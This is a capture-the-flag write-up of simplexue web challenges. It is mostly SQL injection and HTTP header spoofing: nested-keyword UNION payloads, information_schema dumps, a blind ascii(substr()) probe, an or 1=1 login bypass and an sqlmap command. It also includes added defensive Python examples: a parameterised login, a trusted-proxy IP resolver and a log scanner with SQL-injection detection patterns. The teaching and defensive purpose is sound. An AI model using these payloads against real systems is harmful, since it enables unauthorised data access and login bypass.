1. 菊花 (Chrysanthemum)
http://ctf1.simplexue.com/web/6/
Hint:
Please make sure you have installed .net framework 9.9!
Intercept with Burp and change the User-Agent to Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9); all of the injections below are done under that condition.
id=1 shows: hacker:welcome to simplexue CTF
id=4 shows: hacker: don't try again
id=0/**/ununionion/**/seselectlect/**/1,user(),database()
(The keywords are written nested inside themselves and the spaces replaced with /**/ comments, so a filter that strips each keyword once leaves the real keyword behind.)
Username and database name: root@cuit-092a2b258a inject
id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--
simplexue: flag is SimCTF{xuectf}
2. Forbidden
http://ctf1.simplexue.com/basic/header/
Hint:
You don't have permission to access /on this server.
Make sure you are in HongKong
Intercept with Burp and set the header to Accept-Language: zh-hk => KEY:123JustUserAGent
3. 头有点大 (A headache)
http://ctf1.simplexue.com/web/1/index.asp?id=1
Hint:
You don't have permission to access / on this server.
Make sure you are in the region of England and browsing this site with Internet Explorer
Intercept with Burp and set User-Agent: Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)
Accept-Language: en-gb
The key is:HTTpH34der
4. 请输入密码 (Please enter the password)
http://ctf1.simplexue.com/basic/js/index.asp
Intercept with Burp and the JavaScript is obtained:
<script type="text/javascript">
// disable the right-click context menu
document.oncontextmenu=function(){return false};
var a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d / c - b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);
// the password is the floored value of a
function check(){
    if(document.getElementById("txt").value==a){
        return true;
    }else{
        alert("密码错误");
        return false;
    }
}
</script>
Work it out in C:
#include <stdio.h>
int main()
{
    /* same sequence of operations as the page's JavaScript */
    float a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d / c - b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    printf("%f",a);
    return 0;
}
Result: 424178.562500; enter 424178 (the floored value) and the key pops up => @#$JSisagoodtool@#$
5. 这个看起来有点简单 (This one looks a bit easy)
http://ctf5.simplexue.com/8/index.php?id=1
id=1'
id=1 and 1=1
id=1 and 1=2 confirms SQL injection
id=1 order by 2 two columns
id=1 union select 1,2 the 2 is echoed
version(): 5.0.45-community-nt
database(): my_db
user(): phpsql@localhost
Dump the databases:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
information_schema my_db
Dump the tables (0x6d795f6462 is the hex encoding of my_db):
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1
news thiskey
Dump the columns:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1
Dump the contents:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
6. 猫抓老鼠 (Cat catches mouse)
http://ctf1.simplexue.com/basic/catch/
Inspecting the HTTP response shows a header Content-Row: MTQ0ODU0MzEyNA==; submit MTQ0ODU0MzEyNA== => KEY: #WWWnsf0cus_NET#
7. 程序员的问题 (The programmer's problem)
http://ctf1.simplexue.com/web/4/index.php
View the source:
<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("*******", "****", "****");
    mysql_select_db("****") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
    }
    $user = $_POST[user];
    $pass = md5($_POST[pass]);
    $sql = "select user from php where (user='$user') and (pw='$pass')";
    $query = mysql_query($sql);
    if (!$query) {
        printf("Error: %s\n", mysql_error($conn));
        exit();
    }
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
    if($row['user']=="admin") {
        echo "<p>Logged in! Key: *********** </p>";
    }
    if($row['user'] != "admin") {
        echo("<p>You are not admin!</p>");
    }
}
?>
Entering admin gives You are not admin!, which points at closing the parenthesis in the query: enter => ')or 1=1# and get Key: WWW_SIMPLEXUE_COM
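Added example (Python, not part of the write-up or the challenge's code) covering the two injection lessons above. The nested-keyword payloads of challenge 1 work only if the filter strips each keyword a single time (an inference from the payloads, not something the page states), and the challenge-7 login is bypassable only because the POST fields are pasted into the SQL text. The block mirrors a single-pass strip to show it leaves the keyword intact, then puts the same login on a parameterised sqlite query with a salted PBKDF2 hash (a hypothetical scheme; the challenge uses md5), so the `') or 1=1#` input is just a username that matches no row. The table, the `s3cret` password and the in-memory database are constructed.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

# 1) A single-pass keyword strip (what challenge 1's filter appears to do) is
#    not a defence: removing "union" once from "ununionion" leaves "union".
def strip_keywords_once(s: str) -> str:
    for kw in ("union", "select"):
        s = s.replace(kw, "")
    return s

# 2) Password storage for the demo: salted PBKDF2 instead of the challenge's md5
#    (hypothetical scheme, chosen to make the hardened login realistic).
def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()

def verify_password(stored: str, password: str) -> bool:
    salt_hex, _ = stored.split("$", 1)
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    # constant-time comparison so timing does not leak the stored value
    return hmac.compare_digest(stored, candidate)

def make_db() -> sqlite3.Connection:
    # In-memory stand-in for the challenge's "php" table (constructed data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE php (user TEXT PRIMARY KEY, pw TEXT NOT NULL)")
    conn.execute("INSERT INTO php VALUES (?, ?)", ("admin", hash_password("s3cret")))
    conn.commit()
    return conn

def login_safe(conn: sqlite3.Connection, user: str, password: str):
    """Return the matched username, or None.

    The username is bound as a parameter, so quotes and parentheses inside it
    can never change the query's structure the way they do in the challenge's
    string-concatenated "select user from php where (user='$user') ...".
    """
    row = conn.execute(
        "SELECT user, pw FROM php WHERE user = ?", (user,)
    ).fetchone()
    if row is None or not verify_password(row[1], password):
        return None
    return row[0]

if __name__ == "__main__":
    conn = make_db()
    print(strip_keywords_once("ununionion"))           # union
    print(login_safe(conn, "admin", "s3cret"))          # admin
    print(login_safe(conn, "') or 1=1#", "anything"))   # None
```

The lookup and the password check are separate steps on purpose: the query only ever answers "which row has this exact username", and the hash comparison decides the login, so there is no SQL predicate for an injected `or 1=1` to satisfy.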
8. what a fuck! 这是什么鬼东西? (What the hell is this thing?)
http://ctf5.simplexue.com/DUTCTF/1.html
A bit dizzying; it looked like JS obfuscation, so I copied it out, wrapped it in <script> </script>, and it popped up Ihatejs
9. 貌似有点难 (Seems a bit hard)
http://ctf8.simplexue.com/phpaudit/
<?php
function GetIP(){
    if(!empty($_SERVER["HTTP_CLIENT_IP"]))
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    else if(!empty($_SERVER["REMOTE_ADDR"]))
        $cip = $_SERVER["REMOTE_ADDR"];
    else
        $cip = "0.0.0.0";
    return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
    echo "Great! Key is *********";
}
else{
    echo "错误!你的IP不在访问列表之内!";
}
?>
Via the HTTP headers:
Intercept with Burp and add X-Forwarded-For: 1.1.1.1 to spoof the address as 1.1.1.1 (GetIP() consults the client-supplied Client-IP and X-Forwarded-For headers before REMOTE_ADDR) => Key is http_client
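Added example (Python, not the challenge's code) of the fix for the GetIP() pattern above: X-Forwarded-For and Client-IP are ordinary request headers, so they are believed only when REMOTE_ADDR (set by the TCP peer) is one of our own proxies, and even then only the hop that the nearest trusted proxy appended. The `environ` mapping follows the WSGI/CGI naming the PHP code also uses; the trusted-proxy ranges and the addresses in the usage are constructed.

```python
import ipaddress
from typing import Iterable, Mapping

def client_ip(environ: Mapping[str, str], trusted_proxies: Iterable[str]) -> str:
    """Resolve the real client address from a CGI/WSGI-style environ mapping.

    Only REMOTE_ADDR is set by the server from the TCP connection; the
    HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR entries are request headers the
    client can write freely.  They are honoured only when the request came
    through a proxy we operate (constructed list: trusted_proxies), and only
    the right-most hop that is not one of our proxies is believed.
    """
    trusted = [ipaddress.ip_network(p) for p in trusted_proxies]
    remote = environ.get("REMOTE_ADDR", "0.0.0.0")

    def is_trusted(addr: str) -> bool:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False
        return any(ip in net for net in trusted)

    # No trusted proxy in front of us: the forwarding headers mean nothing.
    if not is_trusted(remote):
        return remote

    # Proxies append the peer they saw to the right end of X-Forwarded-For, so
    # walk from the right past our own hops; the first foreign hop is the client.
    chain = [h.strip() for h in environ.get("HTTP_X_FORWARDED_FOR", "").split(",")]
    for hop in reversed([h for h in chain if h]):
        if is_trusted(hop):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break          # malformed entry: fall back rather than trust garbage
        return hop
    return remote

if __name__ == "__main__":
    proxies = ["10.0.0.0/8"]                       # constructed: our reverse proxies
    # direct connection that tries the challenge's trick: header ignored
    print(client_ip({"REMOTE_ADDR": "203.0.113.5",
                     "HTTP_X_FORWARDED_FOR": "1.1.1.1"}, proxies))     # 203.0.113.5
    # same trick behind our proxy: the proxy-appended hop wins
    print(client_ip({"REMOTE_ADDR": "10.0.0.2",
                     "HTTP_X_FORWARDED_FOR": "1.1.1.1, 198.51.100.7"}, proxies))  # 198.51.100.7
```

Note that HTTP_CLIENT_IP is never read at all; an allow-list check like the challenge's `$GetIPs=="1.1.1.1"` must be fed by this function, not by whichever header happens to be present.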
10. 进来就给你想要的 (Come in and get what you want)
http://ctf1.simplexue.com/web/1/index.asp?id=1
This one is about finding the admin backend:
Entering admin and viewing the source gives the hint => Heh, the idea is right, but it's not here. Think about who has the most power
Entering system => KEY: "!!!WellDoneBrother!"
11. 看起来有点难 (Looks a bit hard)
http://ctf1.simplexue.com/basic/inject/
This is a blind injection challenge
Enter the username admin and any password, then submit
It shows: login failed, wrong username and password
Then play it like this:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login
Note:
ascii(str): returns the ASCII code of the first character of str; substr(str,start,length)/substring(str,start,length): extracts a substring (str is the string, start the starting position, length the number of characters)
Database obtained: test
Then replace database() with other expressions to extract the remaining data the same way
Note: this challenge filters select; use selselectect instead
With sqlmap, do it like this:
sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass=" -D test --table
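Added example (Python, not from the write-up) of the detection side of challenges 5 and 11: a small scanner that URL-decodes requests from constructed access-log lines and strips the /**/ comments used as whitespace before matching UNION, ascii(substr()) and information_schema patterns. The log lines, client addresses and rule names are constructed; the rules deliberately avoid word boundaries because "ununionion" still contains "union" as a substring, so the keyword-nesting trick that beats a single-pass filter does not beat a matcher.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache common format, fictitious hosts) that
# mirror the probe styles in this write-up: a comment-split UNION, a blind
# ascii(substr()) probe, information_schema enumeration, and a benign request.
SAMPLE_LOG = """\
203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /web/6/?id=0/**/ununionion/**/seselectlect/**/1,user(),database() HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /basic/inject/index.php?admin=admin'and%20(ascii(substr(database(),1,1))=97)%20%23&pass=admin&action=login HTTP/1.1" 200 318
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /8/index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables HTTP/1.1" 200 640
198.51.100.4 - - [01/Jan/2024:10:00:04 +0000] "GET /8/index.php?id=1 HTTP/1.1" 200 1024
"""

# Rule names are constructed for this demo.  No \b around the keywords: the
# nested spellings on this page ("ununionion", "seselectlect") still contain
# the plain keyword as a substring, so a substring match catches them.
RULES = {
    "union_select": re.compile(r"union.{0,64}?select"),
    "blind_char_probe": re.compile(r"(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\("),
    "schema_enum": re.compile(r"information_schema\."),
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalise(s: str) -> str:
    """Undo the cheap evasions before matching.

    Two rounds of URL decoding catch double-encoded probes; /**/ comments are
    removed because the page's payloads use them in place of spaces; runs of
    whitespace are collapsed and the text lower-cased so the rules stay simple.
    """
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()

def scan(log_text: str):
    """Return [(line_number, [rule names])] for every line that trips a rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = normalise(m.group(1))
        names = [name for name, rx in RULES.items() if rx.search(target)]
        if names:
            hits.append((n, names))
    return hits

if __name__ == "__main__":
    for n, names in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
    # line 1: union_select
    # line 2: blind_char_probe
    # line 3: union_select, schema_enum, tautology
```

The tautology rule is the noisiest of the four (a legitimate query string can contain `and 1=1`), so in practice it is a scoring signal rather than an alert on its own; the blind-probe and schema rules have essentially no benign matches in normal application traffic.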